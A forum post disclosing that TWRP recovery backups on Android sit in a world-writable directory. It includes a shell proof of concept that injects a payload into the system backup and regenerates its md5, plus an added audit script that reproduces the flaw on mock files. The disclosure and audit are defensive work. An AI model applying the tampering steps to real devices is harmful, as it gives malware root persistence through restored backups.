Posted 23 October 2012 - 09:24 AM #1

Well, while I really hate to do this write-up right now regarding one of my favorite recoveries, I feel as though it is needed to continue the development of security in the Android community.

Exploit: File permissions error (general filesystem fault) on Android custom recoveries.

Software(s) affected: TWRP 2.*, CWM (possibly; needs more testing). Only on /data/media devices, as far as we know.

This exploit is very simple, but I would also class it as critical, as it can compromise all user data and binaries in the system. I have talked with Teamwin and they will implement a fix when they can. Not sure on the status of CWM, as koush didn't respond before the write-up.

Exploit information / disclosure:

When we look at the backups in TWRP / CWM, we normally just see our data. Unfortunately, the backup directory is also readable and writable by any user or app, so anything on the device can analyze, modify, or even use our backups as a way to gain system privileges on the device. This is easy to attack but not so easy to patch. The only real fix myself or the developers of TWRP can think of is encrypted backups. While that is in the works, the software is still vulnerable, and a piece of malware could come along and hijack your backup, or propagate itself worm-like into your ROMs through it. Note that the .md5 file TWRP writes next to each backup is no protection here: anything that can rewrite the backup can rewrite the checksum as well, which is exactly what the PoC below does.

Now, is this an absolutely terrible vulnerability? No. It's completely conditional, but still enough to be considered a security flaw. This is why I like SD cards: they have to be written to through API calls (as far as I'm aware). With this exploit, I can just write to /data/media like it's nothing from any app, as the system doesn't see the recovery folder as media_rw. It sees it as:

drwxrwxrwx root root TWRP

Anyone who knows what Linux permissions are and how they work can see two things:

1) That's a system-owned (root) directory.

2) I have read, write and execute permissions IN that system-owned directory.

This leads to: "Hey, I can learn where their backups are and just add a payload to the system backup, owned by root, which causes some fun things when the user restores the system" (replace something as simple as su or chmod), or even replace su so it no longer calls out to Superuser.apk, and then have another payload run as root directly.

While this all seems scary, it's not the end of the world. This exploit can be patched once someone pushes the necessary code to TWRP and an update gets released for it.

All in all, a simple vulnerability in root folder permissions becomes a very scary exploit that can lead to destroying a system, local privilege escalation, and even malware propagation.

PoC:

#!/bin/sh
# The backup directory is world-writable, so this runs as an ordinary app uid.
cd /data/media/TWRP/BACKUPS/{Redacted}/Stock/

# Unpack the system partition backup next to the original archive
mkdir extracted; cd extracted
tar xf ../system.ext4.win; cd ..

# Drop the payload into /system/xbin inside the unpacked backup
dd if=/data/media/payload.bin of=extracted/xbin/payload
chmod 755 extracted/xbin/payload

# Repack the modified tree over the original archive and clean up
cd extracted; tar -cvf ../system.ext4.win *; cd ..
rm -rf extracted

# Regenerate the checksum so the restore-time md5 check still passes
md5sum system.ext4.win > system.ext4.win.md5

Shout outs:

remicks - He's a jerkface but I owe him quite a bit (and it's his birthday today)

couga - For managing to help me disclose this to the devs while I was in class

Dees_troy - For listening to the disclosure and discussing it with me.

Twitter - @xIndirect XDA Profile - Indirect RootzWiki Profile - Indirect
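The permission fault and the PoC above, as an added audit script that is not part of the original post or of TWRP/CWM: it rebuilds the backup layout under a scratch directory, applies the drwxrwxrwx mode, counts world-writable entries with find (the same find run over /data/media/TWRP is the on-device check), and replays the unpack/inject/repack step to show that md5sum -c fails only until the attacker regenerates the sidecar. The serial directory name SERIAL, the archive contents and the payload are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not part of the original post or of TWRP/CWM. It rebuilds the
# backup layout described above under a scratch directory, reproduces the
# drwxrwxrwx fault, finds the world-writable entries, and replays the PoC's
# unpack/inject/repack step to show what the .md5 sidecar does and does not catch.
# The serial directory name SERIAL, the file contents and the tree are constructed.

# Build a constructed mock of /data/media/TWRP/BACKUPS/<serial>/Stock/ under $1
# and apply the faulty permissions. Prints the path of the Stock/ directory.
make_mock_backup() {
    root="$1"
    bk="$root/TWRP/BACKUPS/SERIAL/Stock"
    mkdir -p "$bk/stage/xbin"
    printf 'original su binary (constructed)\n' > "$bk/stage/xbin/su"
    (cd "$bk/stage" && tar -cf ../system.ext4.win xbin)
    rm -rf "$bk/stage"
    (cd "$bk" && md5sum system.ext4.win > system.ext4.win.md5)
    # the fault: every directory on the path is drwxrwxrwx
    chmod 777 "$root/TWRP" "$root/TWRP/BACKUPS" "$root/TWRP/BACKUPS/SERIAL" "$bk"
    echo "$bk"
}

# Count entries under $1 that any uid can write to (other-write bit, octal 0002).
# On a device, the same find over /data/media/TWRP is the audit; anything but 0
# means every app on the phone can rewrite the backups.
count_world_writable() {
    find "$1" -perm -0002 | wc -l | tr -d ' '
}

# Re-run the recovery's own integrity check on the backup in $1; prints OK or BAD.
verify_md5() {
    (cd "$1" && md5sum -c system.ext4.win.md5 >/dev/null 2>&1 && echo OK || echo BAD)
}

# Replay the PoC without the final step: unpack, add xbin/payload, repack.
tamper_backup() {
    bk="$1"
    mkdir -p "$bk/extracted"
    (cd "$bk/extracted" && tar -xf ../system.ext4.win)
    printf 'constructed payload\n' > "$bk/extracted/xbin/payload"
    chmod 755 "$bk/extracted/xbin/payload"
    (cd "$bk/extracted" && tar -cf ../system.ext4.win xbin)
    rm -rf "$bk/extracted"
}

# The PoC's final step: regenerate the sidecar so the check passes again.
regen_md5() {
    (cd "$1" && md5sum system.ext4.win > system.ext4.win.md5)
}

# True if the archive in $1 now carries the injected xbin/payload entry.
has_payload() {
    tar -tf "$1/system.ext4.win" | grep -q '^xbin/payload$'
}

# Demo run: sh audit_backup.sh
demo() {
    tmp=$(mktemp -d)
    bk=$(make_mock_backup "$tmp")
    echo "world-writable entries under mock /data/media: $(count_world_writable "$tmp")"
    echo "md5 check on untouched backup        : $(verify_md5 "$bk")"
    tamper_backup "$bk"
    has_payload "$bk" && echo "archive now contains xbin/payload"
    echo "md5 check after tampering            : $(verify_md5 "$bk")"
    regen_md5 "$bk"
    echo "md5 check after regenerating sidecar : $(verify_md5 "$bk")"
    rm -rf "$tmp"
}
demo
```

The BAD verdict in the middle is the only thing the checksum buys: it catches a corrupted copy, not an attacker, because the same world-writable directory that lets the archive be rewritten lets the .md5 be rewritten with it.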